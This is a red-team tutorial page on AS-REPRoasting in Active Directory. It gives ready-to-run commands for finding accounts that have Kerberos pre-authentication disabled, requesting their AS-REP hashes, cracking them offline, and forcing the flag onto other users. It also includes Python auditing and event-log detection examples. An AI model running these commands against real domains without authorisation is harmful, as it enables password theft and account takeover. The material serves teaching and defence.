
# AS-REPRoasting

If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password. This configuration is set on the user object (the `DONT_REQ_PREAUTH` flag in `userAccountControl`) and is often seen on accounts associated with Linux systems. The only thing the technique requires is the user's username, which is used to send an AS-REQ to the KDC.

As we learned while getting an [overview of the Kerberos authentication process](/red-teaming/notes/kerberos/overview-of-kerberos-authentication.md), if an account has pre-authentication disabled, an attacker can obtain an AS-REP containing an encrypted TGT for the affected account without any prior authentication. Because that reply is encrypted only with a key derived from the user's password, a weak password makes the captured hash crackable offline and the account compromised.

To enumerate accounts vulnerable to AS-REPRoasting we can use tools like ADSearch, PowerView and Impacket:

```
ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
```

```
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
```

```
GetNPUsers.py domain.com/otter
GetNPUsers.py DOMAIN/ -dc-ip 10.10.10.10 -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass
```

To perform the attack we can use Impacket or Rubeus:

```
.\Rubeus.exe asreproast /user:otter /domain:domain.com /dc:dc.domain.com /nowrap /outfile:hashes.txt
```

```
GetNPUsers.py domain.com/otter -request
GetUserSPNs.py -no-preauth otter -usersfile users.list -dc-host 10.10.10.10 domain.com/
```

To crack the hash we can use `john --format=krb5asrep --wordlist=wordlist squid_svc` for John the Ripper or `hashcat -a 0 -m 18200 squid_svc wordlist` for hashcat, where `squid_svc` is the file containing the captured hash and `wordlist` is the candidate password list.

If we compromise an account with `GenericAll` permissions over another user, we can set the `DONT_REQ_PREAUTH` attribute to make that user susceptible to AS-REPRoasting. This is a subtler option than changing the user's password directly, but it requires the password to be weak enough for us to crack the hash.

```
Import-Module .\PowerView.ps1
Set-DomainObject -Identity otter -XOR @{useraccountcontrol=4194304} -Verbose
```
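The LDAP filter above and the `Set-DomainObject -XOR` command both work on the same `userAccountControl` bit (`4194304`, `0x400000`). The following added example (not code from the original note) decodes that bitmask over a constructed list of directory entries so an auditor can list which accounts have pre-authentication disabled, and shows what `-XOR` actually does to the flag: XOR toggles the bit, so it sets `DONT_REQ_PREAUTH` on a normal account but clears it on an account that already has it. The `clear_preauth_flag` helper is the value a remediation would write back. Names and sample accounts are assumptions; no directory is contacted.

```python
"""Decode userAccountControl and flag accounts with Kerberos pre-authentication disabled.

Added example, not part of the original note. SAMPLE_USERS is a constructed stand-in
for what an LDAP query returning cn/sAMAccountName/userAccountControl would produce.
"""

# userAccountControl bit flags (values from the Active Directory schema)
UAC_ACCOUNTDISABLE = 0x0002
UAC_NORMAL_ACCOUNT = 0x0200
UAC_DONT_REQ_PREAUTH = 0x400000  # decimal 4194304, the value used in the LDAP filter above

# Constructed sample directory entries (assumption: this is what enumeration returned)
SAMPLE_USERS = [
    {"sAMAccountName": "otter",
     "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH},
    {"sAMAccountName": "squid_svc",
     "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH | UAC_ACCOUNTDISABLE},
    {"sAMAccountName": "alice",
     "userAccountControl": UAC_NORMAL_ACCOUNT},
]


def preauth_disabled(uac: int) -> bool:
    """True when the DONT_REQ_PREAUTH bit is set (same test as the LDAP matching rule)."""
    return bool(uac & UAC_DONT_REQ_PREAUTH)


def find_roastable(users, include_disabled: bool = False) -> list:
    """Return sAMAccountNames with pre-auth disabled. Disabled accounts cannot
    obtain a TGT, so they are skipped unless the caller wants them for cleanup."""
    found = []
    for user in users:
        uac = int(user["userAccountControl"])
        if not preauth_disabled(uac):
            continue
        if not include_disabled and uac & UAC_ACCOUNTDISABLE:
            continue
        found.append(user["sAMAccountName"])
    return found


def toggle_preauth_flag(uac: int) -> int:
    """What Set-DomainObject -XOR @{useraccountcontrol=4194304} computes:
    XOR flips the bit, so an account that already had it ends up *without* it."""
    return uac ^ UAC_DONT_REQ_PREAUTH


def clear_preauth_flag(uac: int) -> int:
    """Remediation value: clear the bit regardless of its current state."""
    return uac & ~UAC_DONT_REQ_PREAUTH


if __name__ == "__main__":
    print("pre-auth disabled (enabled accounts):", find_roastable(SAMPLE_USERS))
    print("including disabled accounts:", find_roastable(SAMPLE_USERS, include_disabled=True))
    print("XOR on a normal account -> 0x%x" % toggle_preauth_flag(UAC_NORMAL_ACCOUNT))
    print("XOR on an already-flagged account -> 0x%x" % toggle_preauth_flag(UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH))
```

When auditing, test the bit rather than comparing the whole `userAccountControl` value, since other flags (password never expires, smartcard required) are routinely combined with it.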

{% hint style="danger" %}
OPSEC: AS-REPRoasting will generate a 4768 event with RC4 encryption (`0x17`) and a pre-authentication type of `0`.

```
event.code: 4768 and winlog.event_data.PreAuthType: 0 and winlog.event_data.TicketEncryptionType: 0x17
```

{% endhint %}
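As an added example of the detection side of that OPSEC note (not code from the original page), the script below runs the same logic as the query above over a few constructed 4768/4769 events in the `winlog.event_data` layout: it flags TGT requests with `PreAuthType` `0` and `TicketEncryptionType` `0x17`. It also offers a broader mode that ignores the encryption type, since an AS-REP obtained without pre-authentication but with an AES ticket encryption type would slip past the RC4-only query. Field names follow the query on this page; the sample events, user names and addresses are constructed.

```python
"""Detect AS-REPRoasting-style 4768 events: PreAuthType 0 with RC4 (0x17) encryption.

Added example, not part of the original note. SAMPLE_EVENTS are constructed log lines
in the event.code / winlog.event_data shape used by the KQL query above.
"""
import json

# Constructed sample telemetry (assumption: events shipped as JSON with ECS-style fields)
SAMPLE_EVENTS = [
    '{"event": {"code": "4768"}, "winlog": {"event_data": {"TargetUserName": "otter", '
    '"IpAddress": "::ffff:10.10.10.50", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"}}}',
    '{"event": {"code": "4768"}, "winlog": {"event_data": {"TargetUserName": "alice", '
    '"IpAddress": "::ffff:10.10.10.20", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"}}}',
    '{"event": {"code": "4768"}, "winlog": {"event_data": {"TargetUserName": "svc_linux", '
    '"IpAddress": "::ffff:10.10.10.60", "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"}}}',
    '{"event": {"code": "4769"}, "winlog": {"event_data": {"TargetUserName": "otter", '
    '"IpAddress": "::ffff:10.10.10.50", "TicketEncryptionType": "0x17", "Status": "0x0"}}}',
]

TGT_REQUEST = "4768"      # Kerberos authentication ticket (TGT) requested
PREAUTH_NONE = "0"        # no pre-authentication data in the AS-REQ
RC4_HMAC = "0x17"         # encryption type the query above keys on


def parse_event(line: str) -> dict:
    """Pull the fields the rule needs out of one JSON log line."""
    doc = json.loads(line)
    data = doc.get("winlog", {}).get("event_data", {})
    return {
        "code": doc.get("event", {}).get("code"),
        "user": data.get("TargetUserName"),
        "ip": data.get("IpAddress"),
        "preauth": data.get("PreAuthType"),
        "etype": data.get("TicketEncryptionType"),
    }


def is_asrep_roast(ev: dict, rc4_only: bool = True) -> bool:
    """rc4_only=True reproduces the page's query exactly; False also keeps
    unauthenticated AS-REPs that were issued with an AES encryption type."""
    if ev["code"] != TGT_REQUEST or ev["preauth"] != PREAUTH_NONE:
        return False
    return ev["etype"] == RC4_HMAC if rc4_only else True


def detect(lines, rc4_only: bool = True) -> list:
    """Return (user, source ip, etype) for every event matching the rule."""
    return [
        (ev["user"], ev["ip"], ev["etype"])
        for ev in map(parse_event, lines)
        if is_asrep_roast(ev, rc4_only)
    ]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("RC4 AS-REP without pre-auth: user=%s from=%s etype=%s" % hit)
    for hit in detect(SAMPLE_EVENTS, rc4_only=False):
        print("any AS-REP without pre-auth:  user=%s from=%s etype=%s" % hit)
```

The broader mode also fires for accounts that legitimately have pre-authentication disabled each time they log on, so baseline those accounts (the enumeration filter earlier on this page gives the list) and alert on new target users or unusual source addresses rather than on every match.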
